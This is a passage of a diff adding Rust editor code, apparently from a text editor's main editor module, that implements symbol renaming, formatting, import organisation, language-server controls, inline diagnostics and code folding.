rename_range { + this.update_in(cx, |this, window, cx| { + let snapshot = cursor_buffer.read(cx).snapshot(); + let rename_buffer_range = rename_range.to_offset(&snapshot); + let cursor_offset_in_rename_range = + cursor_buffer_offset.saturating_sub(rename_buffer_range.start); + let cursor_offset_in_rename_range_end = + cursor_buffer_offset_end.saturating_sub(rename_buffer_range.start); + + this.take_rename(false, window, cx); + let buffer = this.buffer.read(cx).read(cx); + let cursor_offset = selection.head().to_offset(&buffer); + let rename_start = cursor_offset.saturating_sub(cursor_offset_in_rename_range); + let rename_end = rename_start + rename_buffer_range.len(); + let range = buffer.anchor_before(rename_start)..buffer.anchor_after(rename_end); + let mut old_highlight_id = None; + let old_name: Arc = buffer + .chunks(rename_start..rename_end, true) + .map(|chunk| { + if old_highlight_id.is_none() { + old_highlight_id = chunk.syntax_highlight_id; + } + chunk.text + }) + .collect::() + .into(); + + drop(buffer); + + // Position the selection in the rename editor so that it matches the current selection. + this.show_local_selections = false; + let rename_editor = cx.new(|cx| { + let mut editor = Editor::single_line(window, cx); + editor.buffer.update(cx, |buffer, cx| { + buffer.edit([(0..0, old_name.clone())], None, cx) + }); + let rename_selection_range = match cursor_offset_in_rename_range + .cmp(&cursor_offset_in_rename_range_end) + { + Ordering::Equal => { + editor.select_all(&SelectAll, window, cx); + return editor; + } + Ordering::Less => { + cursor_offset_in_rename_range..cursor_offset_in_rename_range_end + } + Ordering::Greater => { + cursor_offset_in_rename_range_end..cursor_offset_in_rename_range + } + }; + if rename_selection_range.end > old_name.len() { + editor.select_all(&SelectAll, window, cx); + } else { + editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges([rename_selection_range]); + }); + } + editor + }); + cx.subscribe(&rename_editor, |_, _, e: &EditorEvent, cx| { + if e == &EditorEvent::Focused { + cx.emit(EditorEvent::FocusedIn) + } + }) + .detach(); + + let write_highlights = + this.clear_background_highlights::(cx); + let read_highlights = + this.clear_background_highlights::(cx); + let ranges = write_highlights + .iter() + .flat_map(|(_, ranges)| ranges.iter()) + .chain(read_highlights.iter().flat_map(|(_, ranges)| ranges.iter())) + .cloned() + .collect(); + + this.highlight_text::( + ranges, + HighlightStyle { + fade_out: Some(0.6), + ..Default::default() + }, + cx, + ); + let rename_focus_handle = rename_editor.focus_handle(cx); + window.focus(&rename_focus_handle); + let block_id = this.insert_blocks( + [BlockProperties { + style: BlockStyle::Flex, + placement: BlockPlacement::Below(range.start), + height: Some(1), + render: Arc::new({ + let rename_editor = rename_editor.clone(); + move |cx: &mut BlockContext| { + let mut text_style = cx.editor_style.text.clone(); + if let Some(highlight_style) = old_highlight_id + .and_then(|h| h.style(&cx.editor_style.syntax)) + { + text_style = text_style.highlight(highlight_style); + } + div() + .block_mouse_down() + .pl(cx.anchor_x) + .child(EditorElement::new( + &rename_editor, + EditorStyle { + background: cx.theme().system().transparent, + local_player: cx.editor_style.local_player, + text: text_style, + scrollbar_width: cx.editor_style.scrollbar_width, + syntax: cx.editor_style.syntax.clone(), + status: cx.editor_style.status.clone(), + inlay_hints_style: HighlightStyle { + font_weight: Some(FontWeight::BOLD), + ..make_inlay_hints_style(cx.app) + }, + inline_completion_styles: make_suggestion_styles( + cx.app, + ), + ..EditorStyle::default() + }, + )) + .into_any_element() + } + }), + priority: 0, + }], + Some(Autoscroll::fit()), + cx, + )[0]; + this.pending_rename = Some(RenameState { + range, + old_name, + editor: rename_editor, + block_id, + }); + })?; + } + + Ok(()) + })) + } + + pub fn confirm_rename( + &mut self, + _: &ConfirmRename, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + let rename = self.take_rename(false, window, cx)?; + let workspace = self.workspace()?.downgrade(); + let (buffer, start) = self + .buffer + .read(cx) + .text_anchor_for_position(rename.range.start, cx)?; + let (end_buffer, _) = self + .buffer + .read(cx) + .text_anchor_for_position(rename.range.end, cx)?; + if buffer != end_buffer { + return None; + } + + let old_name = rename.old_name; + let new_name = rename.editor.read(cx).text(cx); + + let rename = self.semantics_provider.as_ref()?.perform_rename( + &buffer, + start, + new_name.clone(), + cx, + )?; + + Some(cx.spawn_in(window, async move |editor, cx| { + let project_transaction = rename.await?; + Self::open_project_transaction( + &editor, + workspace, + project_transaction, + format!("Rename: {} → {}", old_name, new_name), + cx, + ) + .await?; + + editor.update(cx, |editor, cx| { + editor.refresh_document_highlights(cx); + })?; + Ok(()) + })) + } + + fn take_rename( + &mut self, + moving_cursor: bool, + window: &mut Window, + cx: &mut Context, + ) -> Option { + let rename = self.pending_rename.take()?; + if rename.editor.focus_handle(cx).is_focused(window) { + window.focus(&self.focus_handle); + } + + self.remove_blocks( + [rename.block_id].into_iter().collect(), + Some(Autoscroll::fit()), + cx, + ); + self.clear_highlights::(cx); + self.show_local_selections = true; + + if moving_cursor { + let cursor_in_rename_editor = rename.editor.update(cx, |editor, cx| { + editor.selections.newest::(cx).head() + }); + + // Update the selection to match the position of the selection inside + // the rename editor. + let snapshot = self.buffer.read(cx).read(cx); + let rename_range = rename.range.to_offset(&snapshot); + let cursor_in_editor = snapshot + .clip_offset(rename_range.start + cursor_in_rename_editor, Bias::Left) + .min(rename_range.end); + drop(snapshot); + + self.change_selections(None, window, cx, |s| { + s.select_ranges(vec![cursor_in_editor..cursor_in_editor]) + }); + } else { + self.refresh_document_highlights(cx); + } + + Some(rename) + } + + pub fn pending_rename(&self) -> Option<&RenameState> { + self.pending_rename.as_ref() + } + + fn format( + &mut self, + _: &Format, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let project = match &self.project { + Some(project) => project.clone(), + None => return None, + }; + + Some(self.perform_format( + project, + FormatTrigger::Manual, + FormatTarget::Buffers, + window, + cx, + )) + } + + fn format_selections( + &mut self, + _: &FormatSelections, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let project = match &self.project { + Some(project) => project.clone(), + None => return None, + }; + + let ranges = self + .selections + .all_adjusted(cx) + .into_iter() + .map(|selection| selection.range()) + .collect_vec(); + + Some(self.perform_format( + project, + FormatTrigger::Manual, + FormatTarget::Ranges(ranges), + window, + cx, + )) + } + + fn perform_format( + &mut self, + project: Entity, + trigger: FormatTrigger, + target: FormatTarget, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let buffer = self.buffer.clone(); + let (buffers, target) = match target { + FormatTarget::Buffers => { + let mut buffers = buffer.read(cx).all_buffers(); + if trigger == FormatTrigger::Save { + buffers.retain(|buffer| buffer.read(cx).is_dirty()); + } + (buffers, LspFormatTarget::Buffers) + } + FormatTarget::Ranges(selection_ranges) => { + let multi_buffer = buffer.read(cx); + let snapshot = multi_buffer.read(cx); + let mut buffers = HashSet::default(); + let mut buffer_id_to_ranges: BTreeMap>> = + BTreeMap::new(); + for selection_range in selection_ranges { + for (buffer, buffer_range, _) in + snapshot.range_to_buffer_ranges(selection_range) + { + let buffer_id = buffer.remote_id(); + let start = buffer.anchor_before(buffer_range.start); + let end = buffer.anchor_after(buffer_range.end); + buffers.insert(multi_buffer.buffer(buffer_id).unwrap()); + buffer_id_to_ranges + .entry(buffer_id) + .and_modify(|buffer_ranges| buffer_ranges.push(start..end)) + .or_insert_with(|| vec![start..end]); + } + } + (buffers, LspFormatTarget::Ranges(buffer_id_to_ranges)) + } + }; + + let transaction_id_prev = buffer.read_with(cx, |b, cx| b.last_transaction_id(cx)); + let selections_prev = transaction_id_prev + .and_then(|transaction_id_prev| { + // default to selections as they were after the last edit, if we have them, + // instead of how they are now. + // This will make it so that editing, moving somewhere else, formatting, then undoing the format + // will take you back to where you made the last edit, instead of staying where you scrolled + self.selection_history + .transaction(transaction_id_prev) + .map(|t| t.0.clone()) + }) + .unwrap_or_else(|| { + log::info!("Failed to determine selections from before format. Falling back to selections when format was initiated"); + self.selections.disjoint_anchors() + }); + + let mut timeout = cx.background_executor().timer(FORMAT_TIMEOUT).fuse(); + let format = project.update(cx, |project, cx| { + project.format(buffers, target, true, trigger, cx) + }); + + cx.spawn_in(window, async move |editor, cx| { + let transaction = futures::select_biased! { + transaction = format.log_err().fuse() => transaction, + () = timeout => { + log::warn!("timed out waiting for formatting"); + None + } + }; + + buffer + .update(cx, |buffer, cx| { + if let Some(transaction) = transaction { + if !buffer.is_singleton() { + buffer.push_transaction(&transaction.0, cx); + } + } + cx.notify(); + }) + .ok(); + + if let Some(transaction_id_now) = + buffer.read_with(cx, |b, cx| b.last_transaction_id(cx))? + { + let has_new_transaction = transaction_id_prev != Some(transaction_id_now); + if has_new_transaction { + _ = editor.update(cx, |editor, _| { + editor + .selection_history + .insert_transaction(transaction_id_now, selections_prev); + }); + } + } + + Ok(()) + }) + } + + fn organize_imports( + &mut self, + _: &OrganizeImports, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let project = match &self.project { + Some(project) => project.clone(), + None => return None, + }; + Some(self.perform_code_action_kind( + project, + CodeActionKind::SOURCE_ORGANIZE_IMPORTS, + window, + cx, + )) + } + + fn perform_code_action_kind( + &mut self, + project: Entity, + kind: CodeActionKind, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let buffer = self.buffer.clone(); + let buffers = buffer.read(cx).all_buffers(); + let mut timeout = cx.background_executor().timer(CODE_ACTION_TIMEOUT).fuse(); + let apply_action = project.update(cx, |project, cx| { + project.apply_code_action_kind(buffers, kind, true, cx) + }); + cx.spawn_in(window, async move |_, cx| { + let transaction = futures::select_biased! { + () = timeout => { + log::warn!("timed out waiting for executing code action"); + None + } + transaction = apply_action.log_err().fuse() => transaction, + }; + buffer + .update(cx, |buffer, cx| { + // check if we need this + if let Some(transaction) = transaction { + if !buffer.is_singleton() { + buffer.push_transaction(&transaction.0, cx); + } + } + cx.notify(); + }) + .ok(); + Ok(()) + }) + } + + fn restart_language_server( + &mut self, + _: &RestartLanguageServer, + _: &mut Window, + cx: &mut Context, + ) { + if let Some(project) = self.project.clone() { + self.buffer.update(cx, |multi_buffer, cx| { + project.update(cx, |project, cx| { + project.restart_language_servers_for_buffers( + multi_buffer.all_buffers().into_iter().collect(), + cx, + ); + }); + }) + } + } + + fn stop_language_server( + &mut self, + _: &StopLanguageServer, + _: &mut Window, + cx: &mut Context, + ) { + if let Some(project) = self.project.clone() { + self.buffer.update(cx, |multi_buffer, cx| { + project.update(cx, |project, cx| { + project.stop_language_servers_for_buffers( + multi_buffer.all_buffers().into_iter().collect(), + cx, + ); + cx.emit(project::Event::RefreshInlayHints); + }); + }); + } + } + + fn cancel_language_server_work( + workspace: &mut Workspace, + _: &actions::CancelLanguageServerWork, + _: &mut Window, + cx: &mut Context, + ) { + let project = workspace.project(); + let buffers = workspace + .active_item(cx) + .and_then(|item| item.act_as::(cx)) + .map_or(HashSet::default(), |editor| { + editor.read(cx).buffer.read(cx).all_buffers() + }); + project.update(cx, |project, cx| { + project.cancel_language_server_work_for_buffers(buffers, cx); + }); + } + + fn show_character_palette( + &mut self, + _: &ShowCharacterPalette, + window: &mut Window, + _: &mut Context, + ) { + window.show_character_palette(); + } + + fn refresh_active_diagnostics(&mut self, cx: &mut Context) { + if let ActiveDiagnostic::Group(active_diagnostics) = &mut self.active_diagnostics { + let buffer = self.buffer.read(cx).snapshot(cx); + let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); + let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); + let is_valid = buffer + .diagnostics_in_range::(primary_range_start..primary_range_end) + .any(|entry| { + entry.diagnostic.is_primary + && !entry.range.is_empty() + && entry.range.start == primary_range_start + && entry.diagnostic.message == active_diagnostics.active_message + }); + + if !is_valid { + self.dismiss_diagnostics(cx); + } + } + } + + pub fn active_diagnostic_group(&self) -> Option<&ActiveDiagnosticGroup> { + match &self.active_diagnostics { + ActiveDiagnostic::Group(group) => Some(group), + _ => None, + } + } + + pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { + self.dismiss_diagnostics(cx); + self.active_diagnostics = ActiveDiagnostic::All; + } + + fn activate_diagnostics( + &mut self, + buffer_id: BufferId, + diagnostic: DiagnosticEntry, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + } + self.dismiss_diagnostics(cx); + let snapshot = self.snapshot(window, cx); + let buffer = self.buffer.read(cx).snapshot(cx); + let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { + return; + }; + + let diagnostic_group = buffer + .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) + .collect::>(); + + let blocks = + renderer.render_group(diagnostic_group, buffer_id, snapshot, cx.weak_entity(), cx); + + let blocks = self.display_map.update(cx, |display_map, cx| { + display_map.insert_blocks(blocks, cx).into_iter().collect() + }); + self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { + active_range: buffer.anchor_before(diagnostic.range.start) + ..buffer.anchor_after(diagnostic.range.end), + active_message: diagnostic.diagnostic.message.clone(), + group_id: diagnostic.diagnostic.group_id, + blocks, + }); + cx.notify(); + } + + fn dismiss_diagnostics(&mut self, cx: &mut Context) { + if matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + }; + + let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); + if let ActiveDiagnostic::Group(group) = prev { + self.display_map.update(cx, |display_map, cx| { + display_map.remove_blocks(group.blocks, cx); + }); + cx.notify(); + } + } + + /// Disable inline diagnostics rendering for this editor. + pub fn disable_inline_diagnostics(&mut self) { + self.inline_diagnostics_enabled = false; + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } + + pub fn inline_diagnostics_enabled(&self) -> bool { + self.inline_diagnostics_enabled + } + + pub fn show_inline_diagnostics(&self) -> bool { + self.show_inline_diagnostics + } + + pub fn toggle_inline_diagnostics( + &mut self, + _: &ToggleInlineDiagnostics, + window: &mut Window, + cx: &mut Context, + ) { + self.show_inline_diagnostics = !self.show_inline_diagnostics; + self.refresh_inline_diagnostics(false, window, cx); + } + + fn refresh_inline_diagnostics( + &mut self, + debounce: bool, + window: &mut Window, + cx: &mut Context, + ) { + if !self.inline_diagnostics_enabled || !self.show_inline_diagnostics { + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + return; + } + + let debounce_ms = ProjectSettings::get_global(cx) + .diagnostics + .inline + .update_debounce_ms; + let debounce = if debounce && debounce_ms > 0 { + Some(Duration::from_millis(debounce_ms)) + } else { + None + }; + self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { + let editor = editor.upgrade().unwrap(); + + if let Some(debounce) = debounce { + cx.background_executor().timer(debounce).await; + } + let Some(snapshot) = editor + .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) + .ok() + else { + return; + }; + + let new_inline_diagnostics = cx + .background_spawn(async move { + let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); + for diagnostic_entry in snapshot.diagnostics_in_range(0..snapshot.len()) { + let message = diagnostic_entry + .diagnostic + .message + .split_once('\n') + .map(|(line, _)| line) + .map(SharedString::new) + .unwrap_or_else(|| { + SharedString::from(diagnostic_entry.diagnostic.message) + }); + let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); + let (Ok(i) | Err(i)) = inline_diagnostics + .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); + inline_diagnostics.insert( + i, + ( + start_anchor, + InlineDiagnostic { + message, + group_id: diagnostic_entry.diagnostic.group_id, + start: diagnostic_entry.range.start.to_point(&snapshot), + is_primary: diagnostic_entry.diagnostic.is_primary, + severity: diagnostic_entry.diagnostic.severity, + }, + ), + ); + } + inline_diagnostics + }) + .await; + + editor + .update(cx, |editor, cx| { + editor.inline_diagnostics = new_inline_diagnostics; + cx.notify(); + }) + .ok(); + }); + } + + pub fn set_selections_from_remote( + &mut self, + selections: Vec>, + pending_selection: Option>, + window: &mut Window, + cx: &mut Context, + ) { + let old_cursor_position = self.selections.newest_anchor().head(); + self.selections.change_with(cx, |s| { + s.select_anchors(selections); + if let Some(pending_selection) = pending_selection { + s.set_pending(pending_selection, SelectMode::Character); + } else { + s.clear_pending(); + } + }); + self.selections_did_change(false, &old_cursor_position, true, window, cx); + } + + fn push_to_selection_history(&mut self) { + self.selection_history.push(SelectionHistoryEntry { + selections: self.selections.disjoint_anchors(), + select_next_state: self.select_next_state.clone(), + select_prev_state: self.select_prev_state.clone(), + add_selections_state: self.add_selections_state.clone(), + }); + } + + pub fn transact( + &mut self, + window: &mut Window, + cx: &mut Context, + update: impl FnOnce(&mut Self, &mut Window, &mut Context), + ) -> Option { + self.start_transaction_at(Instant::now(), window, cx); + update(self, window, cx); + self.end_transaction_at(Instant::now(), cx) + } + + pub fn start_transaction_at( + &mut self, + now: Instant, + window: &mut Window, + cx: &mut Context, + ) { + self.end_selection(window, cx); + if let Some(tx_id) = self + .buffer + .update(cx, |buffer, cx| buffer.start_transaction_at(now, cx)) + { + self.selection_history + .insert_transaction(tx_id, self.selections.disjoint_anchors()); + cx.emit(EditorEvent::TransactionBegun { + transaction_id: tx_id, + }) + } + } + + pub fn end_transaction_at( + &mut self, + now: Instant, + cx: &mut Context, + ) -> Option { + if let Some(transaction_id) = self + .buffer + .update(cx, |buffer, cx| buffer.end_transaction_at(now, cx)) + { + if let Some((_, end_selections)) = + self.selection_history.transaction_mut(transaction_id) + { + *end_selections = Some(self.selections.disjoint_anchors()); + } else { + log::error!("unexpectedly ended a transaction that wasn't started by this editor"); + } + + cx.emit(EditorEvent::Edited { transaction_id }); + Some(transaction_id) + } else { + None + } + } + + pub fn set_mark(&mut self, _: &actions::SetMark, window: &mut Window, cx: &mut Context) { + if self.selection_mark_mode { + self.change_selections(None, window, cx, |s| { + s.move_with(|_, sel| { + sel.collapse_to(sel.head(), SelectionGoal::None); + }); + }) + } + self.selection_mark_mode = true; + cx.notify(); + } + + pub fn swap_selection_ends( + &mut self, + _: &actions::SwapSelectionEnds, + window: &mut Window, + cx: &mut Context, + ) { + self.change_selections(None, window, cx, |s| { + s.move_with(|_, sel| { + if sel.start != sel.end { + sel.reversed = !sel.reversed + } + }); + }); + self.request_autoscroll(Autoscroll::newest(), cx); + cx.notify(); + } + + pub fn toggle_fold( + &mut self, + _: &actions::ToggleFold, + window: &mut Window, + cx: &mut Context, + ) { + if self.is_singleton(cx) { + let selection = self.selections.newest::(cx); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let range = if selection.is_empty() { + let point = selection.head().to_display_point(&display_map); + let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); + let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) + .to_point(&display_map); + start..end + } else { + selection.range() + }; + if display_map.folds_in_range(range).next().is_some() { + self.unfold_lines(&Default::default(), window, cx) + } else { + self.fold(&Default::default(), window, cx) + } + } else { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_ids: HashSet<_> = self + .selections + .disjoint_anchor_ranges() + .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) + .collect(); + + let should_unfold = buffer_ids + .iter() + .any(|buffer_id| self.is_buffer_folded(*buffer_id, cx)); + + for buffer_id in buffer_ids { + if should_unfold { + self.unfold_buffer(buffer_id, cx); + } else { + self.fold_buffer(buffer_id, cx); + } + } + } + } + + pub fn toggle_fold_recursive( + &mut self, + _: &actions::ToggleFoldRecursive, + window: &mut Window, + cx: &mut Context, + ) { + let selection = self.selections.newest::(cx); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let range = if selection.is_empty() { + let point = selection.head().to_display_point(&display_map); + let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); + let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) + .to_point(&display_map); + start..end + } else { + selection.range() + }; + if display_map.folds_in_range(range).next().is_some() { + self.unfold_recursive(&Default::default(), window, cx) + } else { + self.fold_recursive(&Default::default(), window, cx) + } + } + + pub fn fold(&mut self, _: &actions::Fold, window: &mut Window, cx: &mut Context) { + if self.is_singleton(cx) { + let mut to_fold = Vec::new(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all_adjusted(cx); + + for selection in selections { + let range = selection.range().sorted(); + let buffer_start_row = range.start.row; + + if range.start.row != range.end.row { + let mut found = false; + let mut row = range.start.row; + while row <= range.end.row { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) + { + found = true; + row = crease.range().end.row + 1; + to_fold.push(crease); + } else { + row += 1 + } + } + if found { + continue; + } + } + + for row in (0..=range.start.row).rev() { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { + if crease.range().end.row >= buffer_start_row { + to_fold.push(crease); + if row <= range.start.row { + break; + } + } + } + } + } + + self.fold_creases(to_fold, true, window, cx); + } else { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_ids = self + .selections + .disjoint_anchor_ranges() + .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) + .collect::>(); + for buffer_id in buffer_ids { + self.fold_buffer(buffer_id, cx); + } + } + } + + fn fold_at_level( + &mut self, + fold_at: &FoldAtLevel, + window: &mut Window, + cx: &mut Context, + ) { + if !self.buffer.read(cx).is_singleton() { + return; + } + + let fold_at_level = fold_at.0; + let snapshot = self.buffer.read(cx).snapshot(cx); + let mut to_fold = Vec::new(); + let mut stack = vec![(0, snapshot.max_row().0, 1)]; + + while let Some((mut start_row, end_row, current_level)) = stack.pop() { + while start_row < end_row { + match self + .snapshot(window, cx) + .crease_for_buffer_row(MultiBufferRow(start_row)) + { + Some(crease) => { + let nested_start_row = crease.range().start.row + 1; + let nested_end_row = crease.range().end.row; + + if current_level < fold_at_level { + stack.push((nested_start_row, nested_end_row, current_level + 1)); + } else if current_level == fold_at_level { + to_fold.push(crease); + } + + start_row = nested_end_row + 1; + } + None => start_row += 1, + } + } + } + + self.fold_creases(to_fold, true, window, cx); + } + + pub fn fold_all(&mut self, _: &actions::FoldAll, window: &mut Window, cx: &mut Context) { + if self.buffer.read(cx).is_singleton() { + let mut fold_ranges = Vec::new(); + let snapshot = self.buffer.read(cx).snapshot(cx); + + for row in 0..snapshot.max_row().0 { + if let Some(foldable_range) = self + .snapshot(window, cx) + .crease_for_buffer_row(MultiBufferRow(row)) + { + fold_ranges.push(foldable_range); + } + } + + self.fold_creases(fold_ranges, true, window, cx); + } else { + self.toggle_fold_multiple_buffers = cx.spawn_in(window, async move |editor, cx| { + editor + .update_in(cx, |editor, _, cx| { + for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { + editor.fold_buffer(buffer_id, cx); + } + }) + .ok(); + }); + } + } + + pub fn fold_function_bodies( + &mut self, + _: &actions::FoldFunctionBodies, + window: &mut Window, + cx: &mut Context, + ) { + let snapshot = self.buffer.read(cx).snapshot(cx); + + let ranges = snapshot + .text_object_ranges(0..snapshot.len(), TreeSitterOptions::default()) + .filter_map(|(range, obj)| (obj == TextObject::InsideFunction).then_some(range)) + .collect::>(); + + let creases = ranges + .into_iter() + .map(|range| Crease::simple(range, self.display_map.read(cx).fold_placeholder.clone())) + .collect(); + + self.fold_creases(creases, true, window, cx); + } + + pub fn fold_recursive( + &mut self, + _: &actions::FoldRecursive, + window: &mut Window, + cx: &mut Context, + ) { + let mut to_fold = Vec::new(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all_adjusted(cx); + + for selection in selections { + let range = selection.range().sorted(); + let buffer_start_row = range.start.row; + + if range.start.row != range.end.row { + let mut found = false; + for row in range.start.row..=range.end.row { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { + found = true; + to_fold.push(crease); + } + } + if found { + continue; + } + } + + for row in (0..=range.start.row).rev() { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { + if crease.range().end.row >= buffer_start_row { + to_fold.push(crease); + } else { + break; + } + } + } + } + + self.fold_creases(to_fold, true, window, cx); + } + + pub fn fold_at( + &mut self, + buffer_row: MultiBufferRow, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + if let Some(crease) = display_map.crease_for_buffer_row(buffer_row) { + let autoscroll = self + .selections + .all::(cx) + .iter() + .any(|selection| crease.range().overlaps(&selection.range())); + + self.fold_creases(vec![crease], autoscroll, window, cx); + } + } + + pub fn unfold_lines(&mut self, _: &UnfoldLines, _window: &mut Window, cx: &mut Context) { + if self.is_singleton(cx) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let selections = self.selections.all::(cx); + let ranges = selections + .iter() + .map(|s| { + let range = s.display_range(&display_map).sorted(); + let mut start = range.start.to_point(&display_map); + let mut end = range.end.to_point(&display_map); + start.column = 0; + end.column = buffer.line_len(MultiBufferRow(end.row)); + start..end + }) + .collect::>(); + + self.unfold_ranges(&ranges, true, true, cx); + } else { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_ids = self + .selections + .disjoint_anchor_ranges() + .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) + .collect::>(); + for buffer_id in buffer_ids { + self.unfold_buffer(buffer_id, cx); + } + } + } + + pub fn unfold_recursive( + &mut self, + _: &UnfoldRecursive, + _window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all::(cx); + let ranges = selections + .iter() + .map(|s| { + let mut range = s.display_range(&display_map).sorted(); + *range.start.column_mut() = 0; + *range.end.column_mut() = display_map.line_len(range.end.row()); + let start = range.start.to_point(&display_map); + let end = range.end.to_point(&display_map); + start..end + }) + .collect::>(); + + self.unfold_ranges(&ranges, true, true, cx); + } + + pub fn unfold_at( + &mut self, + buffer_row: MultiBufferRow, + _window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + let intersection_range = Point::new(buffer_row.0, 0) + ..Point::new( + buffer_row.0, + display_map.buffer_snapshot.line_len(buffer_row), + ); + + let autoscroll = self + .selections + .all::(cx) + .iter() + .any(|selection| RangeExt::overlaps(&selection.range(), &intersection_range)); + + self.unfold_ranges(&[intersection_range], true, autoscroll, cx); + } + + pub fn unfold_all( + &mut self, + _: &actions::UnfoldAll, + _window: &mut Window, + cx: &mut Context, + ) { + if self.buffer.read(cx).is_singleton() { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + self.unfold_ranges(&[0..display_map.buffer_snapshot.len()], true, true, cx); + } else { + self.toggle_fold_multiple_buffers = cx.spawn(async move |editor, cx| { + editor + .update(cx, |editor, cx| { + for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { + editor.unfold_buffer(buffer_id, cx); + } + }) + .ok(); + }); + } + } + + pub fn fold_selected_ranges( + &mut self, + _: &FoldSelectedRanges, + window: &mut Window, + cx: &mut Context, + ) { + let selections = self.selections.all_adjusted(cx); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let ranges = selections + .into_iter() + .map(|s| Crease::simple(s.range(), display_map.fold_placeholder.clone())) + .collect::>(); + self.fold_creases(ranges, true, window, cx); + } + + pub fn fold_ranges( + &mut self, + ranges: Vec>, + auto_scroll: bool, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let ranges = ranges + .into_iter() + .map(|r| Crease::simple(r, display_map.fold_placeholder.clone())) + .collect::>(); + self.fold_creases(ranges, auto_scroll, window, cx); + } + + pub fn fold_creases( + &mut self, + creases: Vec>, + auto_scroll: bool, + _window: &mut Window, + cx: &mut Context, + ) { + if creases.is_empty() { + return; + } + + let mut buffers_affected = HashSet::default(); + let multi_buffer = self.buffer().read(cx); + for crease in &creases { + if let Some((_, buffer, _)) = + multi_buffer.excerpt_containing(crease.range().start.clone(), cx) + { + buffers_affected.insert(buffer.read(cx).remote_id()); + }; + } + + self.display_map.update(cx, |map, cx| map.fold(creases, cx)); + + if auto_scroll { + self.request_autoscroll(Autoscroll::fit(), cx); + } + + cx.notify(); + + self.scrollbar_marker_state.dirty = true; + self.folds_did_change(cx); + } + + /// Removes any folds whose ranges intersect any of the given ranges. + pub fn unfold_ranges( + &mut self, + ranges: &[Range], + inclusive: bool, + auto_scroll: bool, + cx: &mut Context, + ) { + self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { + map.unfold_intersecting(ranges.iter().cloned(), inclusive, cx) + }); + self.folds_did_change(cx); + } + + pub fn fold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { + if self.buffer().read(cx).is_singleton() || self.is_buffer_folded(buffer_id, cx) { + return; + } + let folded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); + self.display_map.update(cx, |display_map, cx| { + display_map.fold_buffers([buffer_id], cx) + }); + cx.emit(EditorEvent::BufferFoldToggled { + ids: folded_excerpts.iter().map(|&(id, _)| id).collect(), + folded: true, + }); + cx.notify(); + } + + pub fn unfold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { + if self.buffer().read(cx).is_singleton() || !self.is_buffer_folded(buffer_id, cx) { + return; + } + let unfolded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); + self.display_map.update(cx, |display_map, cx| { + display_map.unfold_buffers([buffer_id], cx); + }); + cx.emit(EditorEvent::BufferFoldToggled { + ids: unfolded_excerpts.iter().map(|&(id, _)| id).collect(), + folded: false, + }); + cx.notify(); + } + + pub fn is_buffer_folded(&self, buffer: BufferId, cx: &App) -> bool { + 